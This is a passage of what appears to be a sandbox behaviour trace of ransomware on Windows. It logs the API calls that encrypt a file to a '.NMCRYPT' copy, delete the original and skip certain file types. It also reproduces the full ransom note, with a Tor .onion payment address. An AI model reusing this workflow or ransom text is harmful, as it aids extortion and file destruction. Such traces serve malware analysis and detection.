dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.596] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.597] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.598] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.598] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.599] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0155.599] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.599] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad738) returned 1 [0155.599] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.599] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.599] wcslen (_String="\\\\?\\") returned 0x4 [0155.599] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0155.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.599] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=591) returned 1 [0155.599] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.600] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.601] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.601] GetLastError () returned 0x0 [0155.601] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.602] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.602] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.602] GetLastError () returned 0x0 [0155.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.602] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x4f, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x4f, lpOverlapped=0x0) returned 1 [0155.602] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x4f, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x50) returned 1 [0155.602] GetLastError () returned 0x0 [0155.602] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x50, lpOverlapped=0x0) returned 1 [0155.602] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.602] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0x20 [0155.603] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml", dwFileAttributes=0x20) returned 0 [0155.603] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 1 [0155.603] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0 [0155.603] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" [0155.603] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.603] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2FB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2fb.tmp")) returned 0xd2fb [0155.604] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2FB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2fb.tmp"), dwFlags=0x1) returned 0 [0155.604] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD2FB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd2fb.tmp")) returned 1 [0155.604] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0155.604] wcslen (_String="OK") returned 0x2 [0155.604] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.604] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.604] CryptDestroyKey (hKey=0x9ad738) returned 1 [0155.605] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0155.605] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0155.605] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0155.605] GetLastError () returned 0x12 [0155.605] FindClose (in: hFindFile=0x9ad578 | out: hFindFile=0x9ad578) returned 1 [0155.605] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0155.605] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0155.606] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0155.606] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0155.606] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.606] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.606] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0155.606] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.606] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.606] wcslen (_String="\\\\?\\") returned 0x4 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.exe") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.dll") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.lnk") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.bat") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.ini") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.msi") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*.scf") returned 0 [0155.606] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*pagefile.sys*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*NTUSER.DAT*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", pszSpec="*AppData*") returned 0 [0155.607] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", 